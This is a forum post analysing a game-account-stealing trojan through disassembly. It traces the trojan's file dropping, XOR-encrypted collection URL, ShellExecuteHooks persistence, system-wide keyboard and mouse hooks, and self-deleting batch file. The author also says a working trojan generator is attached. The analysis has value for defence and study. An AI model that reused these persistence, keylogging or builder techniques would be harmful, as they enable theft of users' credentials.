好友
阅读权限255
听众
最后登录1970-1-1
|
Hmily
发表于 2008-12-5 23:14
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子!
病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途!
禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!
From:jjh1260 www.unpack.cn
【文章标题】某巨人木马分析文档&自写生成器
【文章作者】JJH
【工具】OD DELPHI
附件内有WORD分析文档、木马标本、个人写的生成器
纯属娱乐,请勿用于非法用途
另本人不玩巨人,所以也没详细分析,有错误请指出,朋友说木马及生成器都有效
此木马不能过内存,调试请关闭杀软、使用安全卫士即可清除木马
目录
加壳分析
脱壳分析
EXE文件分析……………………………………………………………………………… …...
1、释放木马文件相关………………………………………………………………………
2、收信网址相关………………………………………………………………………………
3、注册表相关…………………………………………………………………………………
4、用LoadLibraryA将DLL加载并试图注入所有进程&HOOK相关……………………..
5、自删除(在系统临时目录下生成自删除的bat文件)……………………………………...
1、加壳分析PEID查壳:
UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo [Overlay]
Protection ID查壳:
Scanning -> E:\bak2\巨人小马.exe
File Type : Exe, Size : 14979 (03A83h) Bytes
-> File has 3715 (0E83h) bytes of appended data starting at offset 02C00h
[!] UPX [unknown / modified] compressed !
2、脱壳分析
简单UPX压缩壳用ESP定律手脱之,LordP完整DUMP,ImportREC修复下,脱壳后文件大小26,243(0x6683) Bytes,查壳显示Microsoft Visual C++ 6.0 [Overlay]编写
3、EXE文件分析⑴释放木马文件相关
%system32%\mgxzghlc.dll(先释放为mgxzghlc.tmp后通过MoveFileExA为mgxzghlc.dll)
//木马DLL,用于注入,8位文件名随机生成
%system32%\mgxzghlc.nls //$94字节 主要存放加密的收信网址
①调用GetSystemDirectoryA获取%system32%存于[[local.280]]中
0040185C |. 8D85 A0FBFFFF lea eax,[local.280] //保存sys路径
00401862 |. 56 push esi ; /BufSize => 104 (260.)
00401863 |. 50 push eax ; |Buffer
00401864 |. FF15 7C304000 call dword ptr ds:[<&KERNEL32.GetSystemD>; \GetSystemDirectoryA
②取时间做种子,用于生成随机数,最终生成8位长文件名,释放资源
00401CDE |. 6A 00 push 0 ; /timer = NULL
00401CE0 |. FF15 E8304000 call dword ptr ds:[<&MSVCRT.time>] ; \time
00401CE6 |. 50 push eax ; /seed = 49028184 (1224900996.)
00401CE7 |. FF15 E4304000 call dword ptr ds:[<&MSVCRT.srand>] ; \srand
00401CED |. 59 pop ecx
00401CEE |. 33F6 xor esi,esi
00401CF0 |. 59 pop ecx
以下是生成文件名循环:
文件名长度为8,每一位根据如下算法生成:(rand() mod $1A) + $61
$61即a,$1A = 26,此算法即随机生成8位小写字母,作为释放的TMP及DLL文件的文件名
00401CF1 |> /FF15 E0304000 call dword ptr ds:[<&MSVCRT.rand>] ; [rand
00401CF7 |. |6A 1A push 1A
00401CF9 |. |99 cdq
00401CFA |. |59 pop ecx
00401CFB |. |F7F9 idiv ecx
00401CFD |. |80C2 61 add dl,61
00401D00 |. |8896 64424000 mov byte ptr ds:[esi+404264],dl
00401D06 |. |46 inc esi
00401D07 |. |83FE 08 cmp esi,8
00401D0A |.^\7C E5 jl short 巨人.00401CF1
/ /生成完整文件路径名:类似 %system32%\utjpwjnf.dll,%system32%\utjpwjnf.tmp
00401893 |. 50 push eax ; /src
00401894 |. 8D85 A0FBFFFF lea eax,[local.280] ; |//sys路径
0040189A |. 50 push eax ; |dest
0040189B |. E8 10090000 call <jmp.&MSVCRT.strcat> ; \strcat
004018C5 |. C745 F4 2E646>mov [local.3],6C6C642E //全局变量[local.3]赋值6C6C642E即.dll
00401930 |. 8D45 EC lea eax,[local.5]
00401933 |. C745 EC 2E746>mov [local.5],706D742E //全局变量[local.5]赋值706D742E即.tmp
//在 system32目录下生成TMP文件
00401957 |. C745 E4 44415>mov [local.7],41544144 //全局变量[local.7]赋值41544144即DATA
(从Exe打包的资源中释放/ResourceType = "DATA"、ResourceName = 65)
//00401770 |. FF15 60304000 call dword ptr ds:[<&KERNEL32.FindResour>; \FindResourceA
//0040177E |. FF15 5C304000 call dword ptr ds:[<&KERNEL32.LoadResour>; \LoadResource
//0040178C |. FF15 58304000 call dword ptr ds:[<&KERNEL32.LockResour>; \SetHandleCount
//0040179B |. FF15 54304000 call dword ptr ds:[<&KERNEL32.SizeofReso>; \SizeofResource
//004017C8 |. FF15 84304000 call dword ptr ds:[<&KERNEL32.WriteFile>>; \WriteFile(把资源写进TMP文件)
③创建.nls文件
00401A6B |. 50 push eax ; /src
00401A6C |. 8D85 9CFAFFFF lea eax,[local.345] ; |
00401A72 |. 50 push eax ; |dest
00401A73 |. E8 FA060000 call <jmp.&MSVCRT.strcpy> ; \strcpy
00401A78 |. 8D45 DC lea eax,[local.9]
00401A7B |. C745 DC 2E6E6>mov [local.9], 736C6E2E // 736C6E2E即.nls
00401A82 |. 50 push eax ; /src = ".nls"
00401A83 |. 8D85 9CFAFFFF lea eax,[local.345] ; |
00401A89 |. 50 push eax ; |%system32%\alxvvskd"
00401A8A |. 895D E0 mov [local.8],ebx ; |
00401A8D |. E8 1E070000 call <jmp.&MSVCRT.strcat> ; \strcat
00401A92 |. 8D85 98F9FFFF lea eax,[local.410]
00401A98 |. 50 push eax
00401A99 |. 8D85 9CFAFFFF lea eax,[local.345]
00401A9F |. 50 push eax
00401AA0 |. E8 D9F9FFFF call 巨人.0040147E //调用CreateFileA创建.nls文件,并把EXE文件结尾$9C的网址相关加密数据写入.nls文件中
⑵收信网址相关
①密钥存放于:$2010处 即$FFFEFDFC
②读取自身EXE文件中数据校验,定位并读取结尾4字节,判断是否等于$BD43DBFE,定位结尾8字节处读取DWORD数据($9C), 再定位于结尾$9C处,即加密后asp网址存放位置
00401028 |. FF15 88304000 call dword ptr ds:[<&KERNEL32.CreateFile>; \CreateFileA
//定位到结尾4字节处
0040103C |. 8B1D 8C304000 mov ebx,dword ptr ds:[<&KERNEL32.SetFile>; kernel32.SetFilePointer
00401042 |. 6A 02 push 2 ; /Origin = FILE_END
00401044 |. 56 push esi ; |pOffsetHi => NULL
00401045 |. 6A FC push -4 ; |OffsetLo = FFFFFFFC (-4.)
00401047 |. 57 push edi ; |hFile
00401048 |. FFD3 call ebx ; \SetFilePointer
//读取最后4字节判断是否等于$ BD43DBFE
0040105C |. FFD6 call esi ; \ReadFile
0040105E |. 817D F4 FEDB4>cmp [local.3],BD43DBFE
//定位并读取结尾4-8的4字节数据,此木马读取值为94
0040107E |. 6A 02 push 2
00401080 |. 57 push edi
00401081 |. 6A F8 push -8
00401083 |. FF75 08 push [arg.1]
00401086 |. FFD3 call ebx ; kernel32.SetFilePointer
00401096 |. FFD6 call esi ; kernel32.ReadFile
//分配94-8个字节内存空间,并从EXE文件中(结尾94-处)读取94-8个字节的ASP收信网址相关数据
004010BA |. 50 push eax ; /size = 8C (140.)
004010BB |. FF15 BC304000 call dword ptr ds:[<&MSVCRT.malloc>] ; \malloc
004010DE |. FFD6 call esi ; kernel32.ReadFile
//以下收信网址解密
算法: 把加密后的数据($8C长)按字节与密钥$FFFEFDFC对应字节异或
0040180A |> /8B45 08 /mov eax,[arg.1]
0040180D |. |8A19 |mov bl,byte ptr ds:[ecx]
0040180F |. |03C2 |add eax,edx
00401811 |. |3018 |xor byte ptr ds:[eax],bl
00401813 |. |41 |inc ecx
00401814 |. |3BCE |cmp ecx,esi
00401816 |. |72 02 |jb short 巨人.0040181A
00401818 |. |8BCF |mov ecx,edi
0040181A |> |42 |inc edx
0040181B |. |3B55 0C |cmp edx,[arg.2]
0040181E |.^\7C EA \jl short 巨人.0040180A
⑶注册表相关
①注册CLSID值
[HKEY_CLASSES_ROOT\ CLSID\]
CLSID: {432BDC7C-DE5B-43f4-AA81-E7F8AFB0182D}
\InprocServer32
类型: REG_SZ
字串:"C:\WINDOWS\system32\ alxvvskd.dll"
// {432BDC7C-DE5B-43f4-AA81-E7F8AFB0182D},汇编代码中字节对应此CLSID
004020FC |. C745 D4 7B343>mov [local.11],3233347B ; |
00402103 |. C745 D8 42444>mov [local.10],37434442 ; |
0040210A |. C745 DC 432D4>mov [local.9],45442D43 ; |
00402111 |. C745 E0 35422>mov [local.8],342D4235 ; |
00402118 |. C745 E4 33663>mov [local.7],2D346633 ; |
0040211F |. C745 E8 41413>mov [local.6],31384141 ; |
00402126 |. C745 EC 2D453>mov [local.5],4637452D ; |
0040212D |. C745 F0 38414>mov [local.4],42464138 ; |
00402134 |. C745 F4 30313>mov [local.3],32383130 ; |
0040213B |. C745 F8 447D0>mov [local.2],7D44
//00401B8C |. FF15 00304000 call dword ptr ds:[<&ADVAPI32.RegOpenKeyA>>; \RegOpenKeyA
//00401BB2 |. FF15 04304000 call dword ptr ds:[<&ADVAPI32.RegQueryValu>; \RegQueryValueA
//00401BEC |. FF15 0C304000 call dword ptr ds:[<&ADVAPI32.RegCloseKey>>; \RegCloseKey
②将木马文件的ID号添加到HOOK项中,使explorer.exe进程自动加载病毒文件
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks\
⑷调用LoadLibraryA将DLL加载试图注入所有进程&HOOK相关
00401C36 |. 50 push eax ; /"%system32%\alxvvskd.dll"
00401C37 |. FF15 64304000 call dword ptr ds:[<&KERNEL32.LoadLibraryA>; \LoadLibraryA
//00401C98 |. FF55 B4 call [local.19]; alxvvskd.10002795 //dll中此函数用于安装钩子
100027AE 8B35 A4300010 mov esi,dword ptr ds:[<&USER32.Set>; USER32.SetWindowsHookExA
100027AE 8B35 A4300010 mov esi,dword ptr ds:[<&USER32.SetWindowsH>; USER32.SetWindowsHookExA
100027B4 57 push edi //0 系统钩子
100027B5 FF35 44430010 push dword ptr ds:[10004344] ; vldncjjo.10000000
100027BB 68 09280010 push vldncjjo.10002809
100027C0 6A 04 push 4 //WH_CALLWNDPROC = 4; //注入所有进程
100027C2 FFD6 call esi USER32.SetWindowsHookExA
100027C4 57 push edi //0 系统钩子
100027C5 A3 4C430010 mov dword ptr ds:[1000434C],eax
100027CA FF35 44430010 push dword ptr ds:[10004344] ; vldncjjo.10000000
100027D0 68 53280010 push vldncjjo.10002853
100027D5 6A 02 push 2 //WH_KEYBOARD = 2;
100027D7 FFD6 call esi USER32.SetWindowsHookExA
100027D9 57 push edi //0 系统钩子
100027DA A3 48430010 mov dword ptr ds:[10004348],eax
100027DF FF35 44430010 push dword ptr ds:[10004344] ; vldncjjo.10000000
100027E5 68 2C280010 push vldncjjo.1000282C
100027EA 6A 07 push 7 //WH_MOUSE = 7;
100027EC FFD6 call esi USER32.SetWindowsHookExA
//依次安装3类系统钩子WH_CALLWNDPROC、WH_KEYBOARD、WH_MOUSE,按键马…
⑸自删除(在系统临时目录下生成自删除的bat文件)
//通过GetTempPathA获取系统TEMP目录,并生成形如3.tmp.bat的文件名
//00401532 . FF15 30304000 call dword ptr ds:[<&KERNEL32.GetTempPathA>; \GetTempPathA
//0040154A . FF15 2C304000 call dword ptr ds:[<&KERNEL32.GetTempFileN>; \GetTempFileNameA
//00401553 . C745 EC 2E626>mov dword ptr ss:[ebp-14],7461622E ; .bat
//通过GetModuleFileNameA获取EXE文件的全路径,用于写入bat文件
00401575 . FF15 28304000 call dword ptr ds:[<&KERNEL32.GetModuleFil>; \GetModuleFileNameA
0040157B . 8D85 BCFEFFFF lea eax,dword ptr ss:[ebp-144]
//以写方式打开bat文件并写入如下类似命令
:t
del "E:\newupx666\巨人\巨人.exe"
if exist "E:\newupx666\巨人\巨人.exe" goto t
del
00401581 . 68 2C404000 push 巨人.0040402C ; /mode = "w"
00401586 . 50 push eax ; |path
00401587 . FF15 D4304000 call dword ptr ds:[<&MSVCRT.fopen>] ; \fopen
// WinExec以SW_HIDE方式执行自删除bat文件
00401645 . 6A 00 push 0 ; /ShowState = SW_HIDE
00401647 . 50 push eax ; ||CmdLine = "C:\DOCUME~1\jjhyou\LOCALS~1\Temp\3.tmp.bat"
00401648 . FF15 24304000 call dword ptr ds:[<&KERNEL32.WinExec>] ; \WinExec
0040164E . 6A 00 push 0 ; /ExitCode = 0
//结束进程
00401650 . FF15 4C304000 call dword ptr ds:[<&KERNEL32.ExitProcess>>; \ExitProcess |
|
[复制链接]
发表于 2008-12-6 09:43
|
发表于 2008-12-6 17:28
发表于 2008-12-9 13:13
